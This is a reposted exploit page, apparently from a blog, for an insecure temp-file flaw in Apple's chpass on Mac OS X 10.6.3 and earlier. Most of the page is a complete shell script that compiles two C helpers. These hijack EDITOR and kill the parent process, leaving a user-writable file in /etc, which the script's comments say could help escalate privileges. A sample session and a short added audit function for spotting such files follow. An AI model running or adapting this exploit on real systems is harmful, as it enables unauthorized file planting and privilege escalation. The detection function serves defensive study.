♺ Google is the best teacher ♺ | University of Gunadarma IT ☺

Apple <= 10.6.3 'chpass' BSD insecure temp file creation in /etc vuln

 Text : 

#!/bin/sh
# Apple <= 10.6.3 'chpass' BSD insecure temp file creation in /etc vuln
# =====================================================================
# A user can create a file with rw perms in /etc as owner and populate
# it with arbitrary data. This could be utilized to fill the disk or
# write configuration file information that could be combined with
# another flaw to elevate local privileges. This shell script takes
# an argument which is the filename to create (appended with .XXXXXX)
# or I.HAX by default.
#
# e.g
#
# fantastics-macbook:~ fantastic$ id
# uid=501(fantastic) gid=20(staff) groups=20(staff)
# fantastics-macbook:~ fantastic$ ls -l /etc
# lrwxr-xr-x@ 1 root wheel 11 10 Feb 18:42 /etc -> private/etc
# fantastics-macbook:~ fantastic$ ./prdelka-vs-APPLE-chpass.sh
# [ Apple <= 10.6.3 'chpass' arbitrary /etc file creation exploit
# Password for fantastic: fuck.apple
# [ Created evil file /etc/I.HAX.9GrrKm
# [ Killing my parent PID 1472
# ./prdelka-vs-APPLE-chpass.sh: line 47: 1472 Killed ./exploit I.HAX
# fantastics-macbook:~ fantastic$ ls -al /etc/I.HAX.9GrrKm
# -rw------- 1 fantastic staff 203 17 May 21:15 /etc/I.HAX.9GrrKm
# fantastics-macbook:~ fantastic$ echo "Turtle power" > /etc/I.HAX.9GrrKm
# fantastics-macbook:~ fantastic$ cat /etc/I.HAX.9GrrKm
# Turtle power
#
# -- prdelka
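cat >> evil.c << EOF
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <signal.h>

/* Runs in place of the editor; argv[1] is the temp file chpass created. */
int main(int argc,char* argv[]){
printf("[ Created evil file %s\n",argv[1]);
pid_t parent = getppid();
printf("[ Killing my parent PID %d\n",parent);
usleep(1000);
kill(parent,9);
exit(0);
}
EOF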
gcc evil.c -o evil 2>/dev/null
rm -rf evil.c
cat >> exploit.c << EOF
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main(int argc,char* argv[]){
char* envp[]={"EDITOR=./evil",NULL};
char* args[]={argv[1],NULL};
printf("[ Apple <= 10.6.3 'chpass' arbitrary /etc file creation exploit\n");
execve("/usr/bin/chpass",args,envp);
}
EOF
gcc exploit.c -o exploit 2>/dev/null
rm -rf exploit.c
if [ $1 ]
then
./exploit $1
else
./exploit I.HAX
fi
rm -rf evil exploit
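
An added check, not part of the original post or of Apple's code: a shell function that lists regular files directly under a directory that are not owned by the expected owner, and marks names ending in a mkstemp-style six-character suffix such as the `/etc/I.HAX.9GrrKm` file shown above. The function name `audit_owner` and the `TEMPLIKE`/`FOREIGN` labels are made up for this example, and the suffix match is a heuristic.

```shell
#!/bin/sh
# Added example: find the artifact this issue leaves behind, i.e. a regular
# file in /etc that is owned by an ordinary user instead of root.
#
# audit_owner DIR [OWNER]
#   DIR    directory to inspect (top level only)
#   OWNER  expected owner, user name or numeric uid (default: root)
# Prints one line per file not owned by OWNER:
#   TEMPLIKE <path>  name ends in ".XXXXXX" (six alphanumerics), as in the
#                    transcript above
#   FOREIGN  <path>  any other file with an unexpected owner
audit_owner() {
    dir=$1
    owner=${2:-root}
    # -H follows a symlinked starting point such as /etc -> private/etc.
    find -H "$dir" -maxdepth 1 -type f ! -user "$owner" 2>/dev/null |
    while IFS= read -r f; do
        case ${f##*/} in
            *.[A-Za-z0-9][A-Za-z0-9][A-Za-z0-9][A-Za-z0-9][A-Za-z0-9][A-Za-z0-9])
                echo "TEMPLIKE $f" ;;
            *)
                echo "FOREIGN  $f" ;;
        esac
    done
}

# Run as a script:  sh audit_owner.sh /etc          (expects root ownership)
#                   sh audit_owner.sh /etc root
if [ "$#" -gt 0 ]; then
    audit_owner "$@"
fi
```

Any line of output for `/etc` is worth a look, since files there are normally owned by root; `ls -l` on the reported path shows the owning account, as in the transcript.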



References: http://securityreason.com/wlb_show/WLB-2010050116

May 21, 2010
 
